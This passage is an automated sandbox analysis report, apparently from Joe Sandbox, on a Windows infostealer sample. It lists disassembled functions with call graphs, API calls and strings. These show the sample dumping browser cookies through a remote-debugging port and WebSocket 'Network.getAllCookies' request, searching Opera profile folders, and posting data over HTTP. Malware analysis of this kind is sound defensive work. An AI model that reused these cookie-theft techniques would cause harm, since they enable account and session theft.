                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$lstrcat$Copy$lstrcpy$CloseCreateFindSleep$DeleteHandleLocalProcessmemset$AllocExistsFirstFreeNextObjectOpenPathReadSingleSizeTerminateThreadWaitlstrlen
                                                                                                                                                                                                                                                  • String ID: --remote-debugging-port=9223 --profile-directory="$Brave$H+c$Opera GX$_cookies.db$_history.db$_webdata.db$q:d$q:d$q:d
                                                                                                                                                                                                                                                  • API String ID: 94806381-1959957562
                                                                                                                                                                                                                                                  • Opcode ID: 127a16f1cfdc933f104487545c4dcec3ebf9936fac967d3ae1bbf9b33bcd2fa0
                                                                                                                                                                                                                                                  • Instruction ID: 174e56ac039bf92636f85ecbebfaea88a4299e227d1b3268452c05c8328876e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 127a16f1cfdc933f104487545c4dcec3ebf9936fac967d3ae1bbf9b33bcd2fa0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9C2E1B5D006599BCB11EF61CC81AEEBBB6FF55308F00411EE41567292DF38AB85CB98
                                                                                                                                                                                                                                                  Function 00409EF0 Relevance: 42.6, APIs: 21, Strings: 3, Instructions: 634networkCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1518 409ef0-409f00 1519 409f12-409f3d call 412b5a 1518->1519 1520 409f02-409f0b 1518->1520 1523 409f59-409f5f 1519->1523 1524 409f3f-409f43 1519->1524 1520->1519 1525 409f65-409fa4 call 412672 1523->1525 1524->1525 1526 409f45-409f57 memmove 1524->1526 1529 409fc0-409fc6 1525->1529 1530 409fa6-409faa 1525->1530 1526->1525 1531 409fcc-409fef 1529->1531 1530->1531 1532 409fac-409fbe memmove 1530->1532 1533 409ff1-409ffd 1531->1533 1534 40a039-40a06d call 412b5a 1531->1534 1532->1531 1535 40a002-40a030 1533->1535 1539 40a08c-40a095 1534->1539 1540 40a06f-40a073 1534->1540 1535->1535 1537 40a032 1535->1537 1537->1534 1542 40a09b-40a0e6 call 412672 1539->1542 1541 40a075-40a08a memmove 1540->1541 1540->1542 1541->1542 1545 40a101-40a110 1542->1545 1546 40a0e8-40a0ef 1542->1546 1547 40a113-40a13c 1545->1547 1546->1547 1548 40a0f1-40a0ff memmove 1546->1548 1549 40a17d-40a19e call 412b5a 1547->1549 1550 40a13e-40a14a 1547->1550 1548->1547 1555 40a1a0-40a1a4 1549->1555 1556 40a1bd-40a1c6 1549->1556 1552 40a14f-40a171 1550->1552 1552->1552 1553 40a173-40a17a 1552->1553 1553->1549 1557 40a1a6-40a1bb memmove 1555->1557 1558 40a1cc-40a240 call 409942 * 7 1555->1558 1556->1558 1557->1558 1573 40a242-40a249 1558->1573 1574 40a24b 1558->1574 1575 40a252-40a25f send 1573->1575 1574->1575 1576 40a343-40a374 closesocket WSACleanup call 41232c 1575->1576 1577 40a265-40a27d recv 1575->1577 1584 40a764-40a77c call 409942 * 2 1576->1584 1577->1576 1578 40a283-40a28a 1577->1578 1580 40a2c8-40a329 call 41232c rand * 4 call 412b82 1578->1580 1581 40a28c-40a298 1578->1581 1593 40a379-40a37f 1580->1593 1594 40a32b-40a33e call 412b82 1580->1594 1583 40a29d-40a2bf 1581->1583 1583->1583 1587 40a2c1 1583->1587 1587->1580 1597 40a381-40a3c8 call 412b82 * 3 call 409882 1593->1597 1598 40a3ca-40a3de call 412b82 1593->1598 1602 40a402-40a41d call 409882 1594->1602 1613 40a41f-40a421 1597->1613 1606 40a3e0-40a400 call 412b82 1598->1606 1612 40a456-40a463 1602->1612 1602->1613 1606->1602 1617 40a465 1612->1617 1618 40a469-40a489 send 1612->1618 1616 40a425-40a42f 1613->1616 1622 40a431 1616->1622 1623 40a438-40a454 call 412b82 1616->1623 1617->1618 1619 40a725-40a745 closesocket WSACleanup 1618->1619 1620 40a48f-40a4ae 1618->1620 1626 40a74f-40a75f call 409942 * 2 1619->1626 1627 40a74a call 41232c 1619->1627 1624 40a4b6-40a4c7 recv 1620->1624 1622->1623 1623->1612 1623->1616 1629 40a4cd-40a504 call 412c14 1624->1629 1630 40a67f-40a6b5 call 412b82 * 2 1624->1630 1626->1584 1627->1626 1640 40a674-40a679 1629->1640 1641 40a50a-40a517 1629->1641 1645 40a6b7 1630->1645 1646 40a6bb-40a6f3 send closesocket WSACleanup 1630->1646 1640->1624 1640->1630 1643 40a536-40a539 1641->1643 1644 40a519-40a51c 1641->1644 1649 40a567-40a56c 1643->1649 1650 40a53b-40a53e 1643->1650 1647 40a522-40a534 1644->1647 1648 40a66a-40a66d 1644->1648 1645->1646 1652 40a6f5-40a703 call 412354 1646->1652 1653 40a708-40a723 call 409942 * 2 call 412bf2 1646->1653 1651 40a571-40a57b 1647->1651 1648->1640 1649->1651 1650->1648 1654 40a544-40a548 1650->1654 1658 40a581-40a586 1651->1658 1659 40a57d-40a57f 1651->1659 1652->1653 1653->1626 1655 40a54a-40a55e 1654->1655 1655->1655 1660 40a560-40a565 1655->1660 1658->1648 1661 40a58c-40a58f 1658->1661 1663 40a593-40a5a3 1659->1663 1660->1651 1661->1663 1663->1648 1665 40a5a9-40a5d0 call 412d80 1663->1665 1671 40a5d2-40a5d8 1665->1671 1672 40a5da-40a5e2 1665->1672 1674 40a605-40a60c 1671->1674 1673 40a5e4-40a5e6 1672->1673 1672->1674 1677 40a5e8-40a603 1673->1677 1675 40a612-40a62b call 412dc2 1674->1675 1676 40a60e 1674->1676 1680 40a62d-40a62f 1675->1680 1681 40a63e 1675->1681 1676->1675 1677->1674 1677->1677 1682 40a631-40a63c memmove 1680->1682 1683 40a642-40a64d call 412bf2 1680->1683 1681->1683 1682->1681 1686 40a664-40a666 1683->1686 1687 40a64f-40a65c 1683->1687 1686->1648 1687->1641 1688 40a662 1687->1688 1688->1648
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006439EB,00403BD8), ref: 00409F4C
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 00409FB3
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?), ref: 0040A07F
                                                                                                                                                                                                                                                    • Part of subcall function 00412672: memcpy.MSVCRT(00000010,?,?,?,00000000,?,?,?,?,004098B8,?,?,?,?,?), ref: 004126CB
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 0040A0F4
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,Sec-WebSocket-Version: 13,?,00000000,000000FF), ref: 0040A1B0
                                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,?,00000000), ref: 0040A256
                                                                                                                                                                                                                                                  • recv.WS2_32(00000000,?,00001000,00000000), ref: 0040A275
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040A2EA
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040A2F3
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040A2FC
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040A305
                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 0040A344
                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 0040A34A
                                                                                                                                                                                                                                                    • Part of subcall function 0041232C: strlen.MSVCRT ref: 0041233A
                                                                                                                                                                                                                                                  • send.WS2_32(?,?,?,00000000), ref: 0040A472
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Sec-WebSocket-Version: 13, xrefs: 0040A184
                                                                                                                                                                                                                                                  • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 0040A03D
                                                                                                                                                                                                                                                  • {"id":1,"method":"Network.getAllCookies"}, xrefs: 0040A2E0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$rand$send$Cleanupclosesocketmemcpyrecvstrlen
                                                                                                                                                                                                                                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13${"id":1,"method":"Network.getAllCookies"}
                                                                                                                                                                                                                                                  • API String ID: 1310494680-79665549
                                                                                                                                                                                                                                                  • Opcode ID: 2f2b8ba2ae1dd3a92bbe92c89018d6b561798d8129df7c2406b3602540458124
                                                                                                                                                                                                                                                  • Instruction ID: 7d3f802dacfbc51c16cf9b5c35bd333ed955a40ae5e02f1ce859e471571e4636
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f2b8ba2ae1dd3a92bbe92c89018d6b561798d8129df7c2406b3602540458124
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D32C0706083509FC324DF24C850BABBBE5AF95304F44492EF4D9973C2DB78A949CB9A
                                                                                                                                                                                                                                                  Function 0040DE0C Relevance: 30.4, APIs: 5, Strings: 12, Instructions: 619fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1920 40de0c-40de42 call 41370e call 413806 1925 40de44-40de55 1920->1925 1926 40de5c-40dea7 call 413860 call 4137c0 call 413770 * 2 call 41398e FindFirstFileA 1920->1926 1925->1926 1937 40e672-40e6c7 call 413770 * 9 1926->1937 1938 40dead-40deca 1926->1938 1939 40ded0-40ded7 1938->1939 1941 40dee9-40defe 1939->1941 1942 40ded9-40dee2 1939->1942 1947 40e660-40e66c FindNextFileA 1941->1947 1948 40df04-40df0b 1941->1948 1942->1941 1947->1937 1947->1939 1950 40df24-40df39 1948->1950 1951 40df0d-40df1d 1948->1951 1950->1947 1956 40df3f-40df9e call 41370e * 7 call 41398e 1950->1956 1951->1950 1983 40dfa0-40dfb3 1956->1983 1984 40dfba-40dfc4 StrCmpCA 1956->1984 1983->1984 1985 40e042-40e065 call 413778 call 413806 1984->1985 1986 40dfc6-40dfd5 call 41398e 1984->1986 1997 40e077-40e35e call 413860 call 413806 call 413860 * 3 call 413806 call 4137c0 call 413770 * 7 call 413860 * 2 call 4137c0 call 413770 * 2 call 413806 call 413860 call 413806 call 413860 * 3 call 413806 call 4137c0 call 413770 * 7 call 413860 * 2 call 4137c0 call 413770 * 2 call 413806 call 413860 call 413806 call 413860 * 4 call 413806 call 413860 call 4137c0 call 413770 * 9 call 413860 * 2 call 4137c0 call 413770 * 2 1985->1997 1998 40e067-40e070 1985->1998 1991 40dff5-40dfff StrCmpCA 1986->1991 1992 40dfd7-40dfee 1986->1992 1991->1985 1994 40e001-40e010 call 41398e 1991->1994 1992->1991 2002 40e012-40e033 1994->2002 2003 40e03a-40e040 StrCmpCA 1994->2003 2128 40e364-40e380 call 413740 call 414ab3 1997->2128 2129 40e42a-40e42e 1997->2129 1998->1997 2002->2003 2003->1985 2128->2129 2146 40e386-40e428 call 413740 * 8 call 40d820 2128->2146 2130 40e434-40e451 call 413740 call 414ab3 2129->2130 2131 40e4fb-40e4ff 2129->2131 2130->2131 2151 40e457-40e4f9 call 413740 * 8 call 40d820 2130->2151 2134 40e505-40e522 call 413740 call 414ab3 2131->2134 2135 40e5cf-40e65a call 41395a * 7 call 413770 * 7 2131->2135 2134->2135 2153 40e528-40e5cd call 413740 * 8 call 40d820 2134->2153 2135->1947 2146->2129 2151->2131 2153->2135
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042EEFC), ref: 0040DE9F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC), ref: 0040DFC0
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040DFFB
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040E040
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00414AB3: GetFileAttributesA.KERNEL32(00000000,?,?,?,00401F5C,?,00000000,?,0042EEFC), ref: 00414AC8
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040E664
                                                                                                                                                                                                                                                    • Part of subcall function 0040D820: FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,0042EEFC), ref: 0040D891
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
                                                                                                                                                                                                                                                  • String ID: Opera$Opera Crypto$Opera GX$\*.*$q:d$q:d$q:d$q:d$q:d$q:d$q:d$q:d
                                                                                                                                                                                                                                                  • API String ID: 3824151033-3007903608
                                                                                                                                                                                                                                                  • Opcode ID: da345ea911fdbb0c6dedb88d97770686dba92db61566b6d7d4b8b57ada552932
                                                                                                                                                                                                                                                  • Instruction ID: 85de566a111d5f1e8b18406dd00569acccaa8dec1bf15e5a141765a1f0173e6d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da345ea911fdbb0c6dedb88d97770686dba92db61566b6d7d4b8b57ada552932
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0432C5B59001189ACF05FF61CC91AEE7B79AF55309F00805EF81567192DF38ABC9CBA8
                                                                                                                                                                                                                                                  Function 00406C70 Relevance: 30.3, APIs: 13, Strings: 4, Instructions: 523networkfilestringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2231 406c70-406d18 call 413740 call 406be0 call 41370e * 5 call 41398e InternetOpenA StrCmpCA 2248 4072fb-407322 InternetCloseHandle call 4147f4 * 2 call 413740 2231->2248 2249 406d1e-406d5e call 4148f3 call 413806 call 4137c0 call 413770 * 2 2231->2249 2260 407327-40737f call 413770 * 9 2248->2260 2271 406d60-406d70 2249->2271 2272 406d77-406d9d call 413860 call 4137c0 call 413770 2249->2272 2271->2272 2286 406dc0-406dfe call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 2272->2286 2287 406d9f-406db9 2272->2287 2306 406e00-406e10 2286->2306 2307 406e17-406ec2 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 413806 call 4137c0 call 413770 * 2 InternetConnectA 2286->2307 2287->2286 2306->2307 2307->2248 2330 406ec8-406efd HttpOpenRequestA 2307->2330 2331 406f03-406f10 2330->2331 2332 4072f4-4072f5 InternetCloseHandle 2330->2332 2333 406f12-406f24 InternetSetOptionA 2331->2333 2334 406f2a-406f34 2331->2334 2332->2248 2333->2334 2335 406f36-406f50 2334->2335 2336 406f57-406f95 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 2334->2336 2335->2336 2349 406f97-406fa7 2336->2349 2350 406fae-406fee call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 2336->2350 2349->2350 2363 406ff0-407001 2350->2363 2364 407008-40702b call 413860 call 4137c0 call 413770 2350->2364 2363->2364 2371 407047-407110 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 2364->2371 2372 40702d-407040 2364->2372 2415 407130-4071c3 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 41370e call 413806 * 2 call 4137c0 call 413770 * 2 2371->2415 2416 407112-407129 2371->2416 2372->2371 2447 4071c5-407215 call 41398e lstrlenA call 41398e * 2 lstrlenA call 41398e 2415->2447 2416->2415 2457 407272-40728d InternetReadFile 2447->2457 2458 407217-407226 Sleep 2447->2458 2459 4072da-4072f1 InternetCloseHandle call 413770 2457->2459 2460 40728f-407294 2457->2460 2461 407235-40723c 2458->2461 2462 407228-407233 2458->2462 2459->2332 2460->2459 2463 407296 2460->2463 2464 407258-40726d call 41370e call 413770 2461->2464 2465 40723e-407251 2461->2465 2462->2447 2462->2461 2467 407299-4072d1 call 413860 call 4137c0 call 413770 InternetReadFile 2463->2467 2464->2260 2465->2464 2467->2459 2479 4072d3-4072d8 2467->2479 2479->2459 2479->2467
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,?), ref: 00406CFD
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,?,?), ref: 00406D10
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004072FC
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00406EB4
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00406EF2
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00406F24
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042EEFC,?,?,?,?,?,",?,?,build_id), ref: 004071DE
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004071FB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040721E
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00407285
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 004072C9
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004072DD
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004072F5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
